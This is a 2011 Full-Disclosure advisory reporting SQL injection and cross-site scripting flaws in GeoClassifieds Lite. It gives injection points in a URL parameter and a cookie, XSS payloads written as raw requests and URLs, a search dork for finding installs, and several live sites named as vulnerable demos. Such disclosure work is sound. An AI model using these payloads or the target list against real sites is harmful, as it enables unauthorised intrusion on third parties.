[Full-disclosure] GeoClassifieds Lite Multiple vulnerabilities



---------------------------------------------------------------------
[+] Title : GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 &V2.0.4
[+] Software Link : http://geodesicsolutions.com/
[+] Tested on : Windows 7 <Firefox>
[+] Date : 25/08/2011
[+] Dork : "inurl:/admin/ Classifieds and Auctions
Software by Geodesic Solutions"
[+] Category : Webapps
[+] Severity : High to Medium
[+] Author : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site : http://www.Yaboukir.Com
----------------------------------------------------------------------

[+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo
Classifieds Premier gives you all the options of the Basic classifieds
software edition, plus additional flexibility and powerful
functionality. It allows you to create multiple user groups and
multiple pricing plans, and is built to suit the most complicated
E-Commerce needs.

[+] How That can be Exploited :

### V2.0.1 : Suffer from SQL Injection and Cross site scripting (Xss)
vulnerability.

1- SQL Injection (High) :

http://Localhost/?a=19&c=id [SQL Attack]

2- Cookies Based SQL Injection (High) :

# Read More About The Attack :
http://www.Yaboukir.com/cookie-based-sql-injection/

The idea of the PoC is to Intercept the HTTP request sent to the
vulnerable Website using a Web Proxy (WebScarab for example or just
Tamper Data Firefox Add-on) then and modify The Cookie variable
language_id .

GET HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: language_id=1[SQL attack]

3- Cross Site Scripting (Medium) :

The same thing with the Xss Vulnerability, all you have is to modify
the HTTP request .

GET HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: </div><script>alert('Xssed-By-Yassin');</script>

Demos:
http://classified4u.biz/
http://www.freeclassifieds.aapkakolkata.com/


### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from Cross site scripting (Xss).

1- Cross Site Scripting (Medium) :

http://Localhost/index.php?a=19&c=</div><script>alert('Xssed By
Yassin');</script>
http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

Demos:
http://www.tescal.com/ads/
http://www.216ads.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/